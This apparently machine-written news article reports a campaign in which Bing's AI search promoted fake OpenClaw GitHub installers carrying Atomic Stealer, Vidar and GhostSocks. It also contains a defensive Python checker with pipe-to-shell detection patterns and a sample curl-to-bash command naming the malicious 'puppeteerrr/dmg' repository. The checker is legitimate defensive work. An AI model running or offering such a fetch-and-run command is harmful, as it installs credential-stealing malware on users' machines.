Ethical Hacking News
A recent cybersecurity alert warns users of a new threat that exploits Microsoft's AI-powered search feature, Bing, to promote fake GitHub repositories hosting information-stealing malware. The malicious campaign is linked to the popular open-source AI agent, OpenClaw. Users are advised to exercise caution and verify software sources to avoid falling prey to this threat.
The latest cybersecurity alert issued by Huntress highlights a significant threat to users seeking the popular open-source AI agent, OpenClaw. The malicious campaign exploits Microsoft's AI-enhanced search feature, Bing, to promote fake GitHub repositories that host information-stealing malware. Threat actors set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool. The fake repositories contained malware designed to steal information and convert users' machines into proxy nodes. Users are advised to bookmark official portals instead of searching online each time to mitigate the risk of encountering fake repositories or malicious installers.
The latest cybersecurity alert issued by researchers at Huntress highlights a significant threat to users seeking the popular open-source AI agent, OpenClaw. The malicious campaign exploits Microsoft's AI-enhanced search feature, Bing, to promote fake GitHub repositories that host information-stealing malware.
According to the report, the threat actor set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool. The repositories were designed to look legitimate, with the threat actor tying them to a real GitHub organization named openclaw-installer and copying code from the Cloudflare moltworker project.
The fake OpenClaw repository contained an installation guide for macOS users that instructed them to paste a bash command in Terminal, which would reach a separate GitHub organization called puppeteerrr and a repository named dmg. This repository contained a shell script paired with a Mach-O executable, identified as the Atomic Stealer malware by Huntress.
For Windows users, the threat actor used the fake repositories to deliver OpenClaw_x64.exe, which deployed multiple malicious executables. Most of these executables were Rust-based malware loaders that executed information stealers in memory, including Vidar stealer and GhostSocks backconnect proxy malware. The latter was designed to convert users' machines into a proxy node, allowing attackers to access accounts with stolen credentials.
The malicious campaign has been identified by Huntress as part of a larger threat actor operation that spread multiple executables for malware loaders and infostealers. The researchers have reported the malicious repositories to GitHub, although it is unclear if they have been removed by now.
This incident highlights the risks associated with relying on AI-powered search features like Bing to find software or tools online. As Huntress noted, simply hosting malware on GitHub was enough to poison Bing's AI search results. This underscores the importance of verifying software sources and being cautious when using AI-driven search recommendations.
The OpenClaw project itself is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. Its broad access to the local system has made it vulnerable to exploitation, with threat actors seeking to collect sensitive information by publishing malicious skills on its official registry and GitHub.
In light of this incident, users are advised to bookmark the official portals of software they use instead of searching online each time. This can help mitigate the risk of encountering fake repositories or malicious installers.
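The macOS lure described above sat in one GitHub organization while its Terminal command fetched from another, which is something a reader can check before pasting anything. The following is an added example, not code from Huntress or from the article: a small pre-paste review of an install command, in which `TRUSTED_OWNERS`, the command shape and the script name `PLACEHOLDER.sh` are assumptions and only the organization and repository names come from the report.

```python
import re
from urllib.parse import urlparse

# Assumption: placeholder for the account you verified out of band as official.
TRUSTED_OWNERS = {"official-org-placeholder"}
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com", "codeload.github.com"}
URL_RE = re.compile(r"https?://[^\s\"'|;)<>]+")
# A download piped into a shell, or substituted into `sh -c "$(...)"`.
PIPE_TO_SHELL_RE = re.compile(
    r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    r"|\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b"
)

# Constructed sample: the organization and repository names are the ones the
# article reports; the command shape and script name are placeholders.
CONSTRUCTED_COMMAND = (
    '/bin/bash -c "$(curl -fsSL '
    'https://raw.githubusercontent.com/puppeteerrr/dmg/main/PLACEHOLDER.sh)"'
)


def github_owner(url):
    """Return the lower-cased account that owns a GitHub URL, else None."""
    parsed = urlparse(url)
    if (parsed.hostname or "").lower() not in GITHUB_HOSTS:
        return None
    parts = [p for p in parsed.path.split("/") if p]
    return parts[0].lower() if parts else None


def review_install_command(command, hosting_owner, trusted=TRUSTED_OWNERS):
    """List reasons not to paste `command`, found in a guide under `hosting_owner`."""
    findings = []
    hosting_owner = hosting_owner.lower()
    if hosting_owner not in trusted:
        findings.append(f"guide is hosted by unverified owner '{hosting_owner}'")
    if PIPE_TO_SHELL_RE.search(command):
        findings.append("remote content is executed directly by a shell")
    for url in URL_RE.findall(command):
        owner = github_owner(url)
        if owner is None:
            findings.append(f"fetches from non-GitHub host: {url}")
        elif owner != hosting_owner:
            findings.append(f"fetches from a different GitHub owner '{owner}'")
    return findings


if __name__ == "__main__":
    for finding in review_install_command(CONSTRUCTED_COMMAND, "openclaw-installer"):
        print("WARN:", finding)
```

The command is only parsed as text and is never executed or fetched.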
The case also serves as a reminder to stay informed about emerging cybersecurity threats and to remain vigilant when interacting with software online.
Related Information:
https://www.ethicalhackingnews.com/articles/Fake-OpenClaw-GitHub-Repo-Malware-Alert-Bing-AI-Powered-Search-Promotes-Info-Stealing-Malicious-Software-ehn.shtml
Published: Thu Mar 5 17:50:07 2026 by llama3.2 3B Q4_K_M